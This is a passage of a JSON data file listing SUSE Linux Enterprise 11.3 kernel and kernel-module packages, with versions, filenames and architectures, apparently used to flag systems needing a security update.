"OSVersion": "11.3", "packageVersion": "1.4.20_3.0.101_rt130_0.28-0.38.84", "packageFilename": "iscsitarget-kmp-rt_trace-1.4.20_3.0.101_rt130_0.28-0.38.84.x86_64.rpm", "packageName": "iscsitarget-kmp-rt_trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-default", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-ec2-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-ec2", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-syms-3.0.101-0.40.1.s390x.rpm", "packageName": "kernel-syms", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-base-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-default-base", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-default", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-3.0.101-0.40.1.ia64.rpm", "packageName": "kernel-trace", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-trace-2_3.0.101_0.40-0.16.104.ppc64.rpm", "packageName": "gfs2-kmp-trace", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-ppc64-1.4_3.0.101_0.40-2.27.98.ppc64.rpm", "packageName": "cluster-network-kmp-ppc64", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-extra-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-xen-extra", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-syms-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-syms", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-source-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-source", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-default-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-default-2_3.0.101_0.40-0.16.104.ppc64.rpm", "packageName": "gfs2-kmp-default", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-source-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-source", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-xen-1.6_3.0.101_0.40-0.20.98.x86_64.rpm", "packageName": "ocfs2-kmp-xen", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-xen", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-trace-1.6_3.0.101_0.40-0.20.98.ia64.rpm", "packageName": "ocfs2-kmp-trace", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-trace-1.4_3.0.101_0.40-2.27.98.ia64.rpm", "packageName": "cluster-network-kmp-trace", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-default-1.6_3.0.101_0.40-0.20.98.x86_64.rpm", "packageName": "ocfs2-kmp-default", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-xen-1.4_3.0.101_0.40-2.27.98.x86_64.rpm", "packageName": "cluster-network-kmp-xen", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "3.0.101.rt130-0.28.1", "packageFilename": "kernel-rt-base-3.0.101.rt130-0.28.1.x86_64.rpm", "packageName": "kernel-rt-base", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-devel-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-default-devel", "arch": "ppc64", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-extra-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-default-extra", "arch": "ppc64", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-pae-extra-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-pae-extra", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-source-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-source", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-syms-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-syms", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-trace-1.4_3.0.101_0.40-2.27.98.x86_64.rpm", "packageName": "cluster-network-kmp-trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-default-2_3.0.101_0.40-0.16.104.x86_64.rpm", "packageName": "gfs2-kmp-default", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-default-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-source-3.0.101-0.40.1.s390x.rpm", "packageName": "kernel-source", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "3.0.101.rt130-0.28.1", "packageFilename": "kernel-syms-rt-3.0.101.rt130-0.28.1.x86_64.rpm", "packageName": "kernel-syms-rt", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-devel-3.0.101-0.40.1.ia64.rpm", "packageName": "kernel-trace-devel", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-3.0.101-0.40.1.ia64.rpm", "packageName": "kernel-default", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "4.2.4_04_3.0.101_0.40-0.7.3", "packageFilename": "xen-kmp-default-4.2.4_04_3.0.101_0.40-0.7.3.i586.rpm", "packageName": "xen-kmp-default", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "4.2.4_04_3.0.101_0.40-0.7.3", "packageFilename": "xen-kmp-pae-4.2.4_04_3.0.101_0.40-0.7.3.i586.rpm", "packageName": "xen-kmp-pae", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-base-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-default-base", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-devel-3.0.101-0.40.1.ia64.rpm", "packageName": "kernel-default-devel", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-base-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-trace-base", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-base-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-xen-base", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-extra-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-xen-extra", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "4.2.4_04_3.0.101_0.40-0.7.3", "packageFilename": "xen-kmp-default-4.2.4_04_3.0.101_0.40-0.7.3.x86_64.rpm", "packageName": "xen-kmp-default", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-pae-base-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-pae-base", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-extra-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-default-extra", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-pae-1.4_3.0.101_0.40-2.27.98.i586.rpm", "packageName": "cluster-network-kmp-pae", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-3.0.101-0.40.1.s390x.rpm", "packageName": "kernel-trace", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-xen-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "1.5.4.1_3.0.101_rt130_0.28-0.13.90", "packageFilename": "ofed-kmp-rt-1.5.4.1_3.0.101_rt130_0.28-0.13.90.x86_64.rpm", "packageName": "ofed-kmp-rt", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-xen-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-base-3.0.101-0.40.1.ia64.rpm", "packageName": "kernel-default-base", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-default-2_3.0.101_0.40-0.16.104.ia64.rpm", "packageName": "gfs2-kmp-default", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "1.5.4.1_3.0.101_rt130_0.28-0.13.90", "packageFilename": "ofed-kmp-rt_trace-1.5.4.1_3.0.101_rt130_0.28-0.13.90.x86_64.rpm", "packageName": "ofed-kmp-rt_trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "3.0.101.rt130-0.28.1", "packageFilename": "kernel-rt-3.0.101.rt130-0.28.1.x86_64.rpm", "packageName": "kernel-rt", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-default-1.6_3.0.101_0.40-0.20.98.s390x.rpm", "packageName": "ocfs2-kmp-default", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-pae-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-pae", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-xen-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-source-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-source", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-default", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-default-1.4_3.0.101_0.40-2.27.98.s390x.rpm", "packageName": "cluster-network-kmp-default", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-trace-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-base-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-xen-base", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "3.0.101.rt130-0.28.1", "packageFilename": "kernel-source-rt-3.0.101.rt130-0.28.1.x86_64.rpm", "packageName": "kernel-source-rt", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-trace-1.4_3.0.101_0.40-2.27.98.ppc64.rpm", "packageName": "cluster-network-kmp-trace", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-base-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-default-base", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-default-1.4_3.0.101_0.40-2.27.98.ppc64.rpm", "packageName": "cluster-network-kmp-default", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-devel-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-trace-devel", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-trace-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_0.40-2.27.98", "packageFilename": "cluster-network-kmp-default-1.4_3.0.101_0.40-2.27.98.x86_64.rpm", "packageName": "cluster-network-kmp-default", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-base-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-default-base", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-default-1.6_3.0.101_0.40-0.20.98.ppc64.rpm", "packageName": "ocfs2-kmp-default", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-pae-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-pae", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-base-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-trace-base", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "2.1.1_3.0.101_rt130_0.28-0.11.75", "packageFilename": "lttng-modules-kmp-rt_trace-2.1.1_3.0.101_rt130_0.28-0.11.75.x86_64.rpm", "packageName": "lttng-modules-kmp-rt_trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-base-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-trace-base", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-pae-base-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-pae-base", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-trace", "arch": "i586", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-extra-3.0.101-0.40.1.ia64.rpm", "packageName": "kernel-default-extra", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "3.0.101.rt130-0.28.1", "packageFilename": "kernel-rt_trace-base-3.0.101.rt130-0.28.1.x86_64.rpm", "packageName": "kernel-rt_trace-base", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-xen", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-base-3.0.101-0.40.1.ia64.rpm", "packageName": "kernel-trace-base", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-pae-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-pae-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-xen-2_3.0.101_0.40-0.16.104.x86_64.rpm", "packageName": "gfs2-kmp-xen", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-ec2-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-ec2", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-xen-devel", "arch": "i586", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-extra-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-xen-extra", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-syms-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-syms", "arch": "i586", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-extra-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-default-extra", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "1.4.20_3.0.101_rt130_0.28-0.38.84", "packageFilename": "iscsitarget-kmp-rt-1.4.20_3.0.101_rt130_0.28-0.38.84.x86_64.rpm", "packageName": "iscsitarget-kmp-rt", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-devel-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-trace-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Real Time Extension", "OSVersion": "11.3", "packageVersion": "1.4_3.0.101_rt130_0.28-2.27.99", "packageFilename": "cluster-network-kmp-rt_trace-1.4_3.0.101_rt130_0.28-2.27.99.x86_64.rpm", "packageName": "cluster-network-kmp-rt_trace", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "4.2.4_04_3.0.101_0.40-0.7.3", "packageFilename": "xen-kmp-default-4.2.4_04_3.0.101_0.40-0.7.3.i586.rpm", "packageName": "xen-kmp-default", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-3.0.101-0.40.1.s390x.rpm", "packageName": "kernel-default", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-base-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-xen-base", "arch": "i586", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-extra-3.0.101-0.40.1.s390x.rpm", "packageName": "kernel-default-extra", "arch": "s390x", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-ppc64-extra-3.0.101-0.40.1.ppc64.rpm", "packageName": "kernel-ppc64-extra", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-devel-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-default-devel", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-trace-2_3.0.101_0.40-0.16.104.i586.rpm", "packageName": "gfs2-kmp-trace", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-devel-3.0.101-0.40.1.s390x.rpm", "packageName": "kernel-trace-devel", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-pae-2_3.0.101_0.40-0.16.104.i586.rpm", "packageName": "gfs2-kmp-pae", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-xen-1.6_3.0.101_0.40-0.20.98.i586.rpm", "packageName": "ocfs2-kmp-xen", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-default-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-default", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-source-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-source", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-source-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-source", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "1.6_3.0.101_0.40-0.20.98", "packageFilename": "ocfs2-kmp-trace-1.6_3.0.101_0.40-0.20.98.ppc64.rpm", "packageName": "ocfs2-kmp-trace", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-trace-2_3.0.101_0.40-0.16.104.s390x.rpm", "packageName": "gfs2-kmp-trace", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise High Availability Extension", "OSVersion": "11.3", "packageVersion": "2_3.0.101_0.40-0.16.104", "packageFilename": "gfs2-kmp-ppc64-2_3.0.101_0.40-0.16.104.ppc64.rpm", "packageName": "gfs2-kmp-ppc64", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-pae-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-pae", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-trace-base-3.0.101-0.40.1.s390x.rpm", "packageName": "kernel-trace-base", "arch": "s390x", "operator": "lt"}, {"OS": "SLE SERVER Unsupported Extras", "OSVersion": "11", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-xen-extra-3.0.101-0.40.1.x86_64.rpm", "packageName": "kernel-xen-extra", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "3.0.101-0.40.1", "packageFilename": "kernel-syms-3.0.101-0.40.1.i586.rpm", "packageName": "kernel-syms", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux 